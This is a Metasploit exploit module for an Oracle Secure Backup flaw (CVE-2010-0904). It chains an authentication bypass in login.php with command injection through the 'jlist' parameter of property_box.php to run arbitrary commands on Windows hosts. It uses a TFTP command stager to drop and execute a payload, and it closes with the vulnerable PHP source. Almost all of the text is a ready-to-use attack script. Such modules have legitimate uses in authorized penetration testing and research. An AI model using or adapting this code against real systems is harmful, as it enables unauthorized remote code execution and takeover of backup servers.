Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability

`##  
# $Id: osb_uname_jlist.rb 13591 2011-08-19 18:35:29Z mc $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = GreatRanking  
  
include Msf::Exploit::CmdStagerTFTP  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability',  
'Description' => %q{  
This module exploits an authentication bypass vulnerability  
in login.php. In conjuction with the authentication bypass issue,  
the 'jlist' parameter in property_box.php can be used to execute  
arbitrary system commands.  
This module was tested against Oracle Secure Backup version 10.3.0.1.0  
},  
'Author' => [ 'MC' ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision: 13591 $',  
'References' =>  
[  
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-118' ],  
[ 'CVE', '2010-0904' ],  
# the jlist vector has not been disclosed or has it?  
],  
'Targets' =>  
[  
[ 'Windows Universal',   
{   
'Arch' => ARCH_X86,  
'Platform' => 'win'  
}   
]  
],  
'Privileged' => 'true',  
'Platform' => 'win',  
'DisclosureDate' => 'Jul 13 2010',  
'DefaultTarget' => 0))  
  
register_options(  
[  
Opt::RPORT(443),  
OptBool.new('SSL', [true, 'Use SSL', true]),  
OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])  
], self.class)  
end  
  
def windows_stager  
  
exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"  
  
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")  
execute_cmdstager({ :temp => '.'})  
@payload_exe = payload_exe  
  
print_status("Attempting to execute the payload...")  
execute_command(@payload_exe)  
  
end  
  
def execute_command(cmd, opts = {})  
  
res = send_request_cgi(  
{  
'uri' => '/login.php',  
'data' => 'attempt=1&uname=-',  
'method' => 'POST',  
}, 5)  
  
if (res.headers['Set-Cookie'] and res.headers['Set-Cookie'].match(/PHPSESSID=(.*);(.*)/i))  
sessionid = res.headers['Set-Cookie'].split(';')[0]  
  
data = '?type=Job&jlist=0%26' + Rex::Text::uri_encode(cmd)  
  
send_request_raw(  
{  
'uri' => '/property_box.php' + data,  
'cookie' => sessionid,  
'method' => 'GET',  
}, 5)  
  
else  
print_error("Invalid PHPSESSION token..")  
return  
end  
end  
  
def exploit  
  
if not datastore['CMD'].empty?  
print_status("Executing command '#{datastore['CMD']}'")  
execute_command(datastore['CMD'])  
return  
end  
  
case target['Platform']  
when 'win'  
windows_stager  
else  
raise RuntimeError, 'Target not supported.'  
end  
  
handler  
  
end  
end  
__END__  
else if (strcmp($type, "Job") == 0)  
{  
if (!is_array($objectname))  
$objectname = array();  
reset($objectname);  
while (list(,$oname) = each($objectname))  
{  
$oname = escapeshellarg($oname);  
$jlist = "$jlist $oname";  
}  
if (strlen($jlist) > 0)  
$msg = exec_qr("$rbtool lsjob -lrRLC $jlist");  
`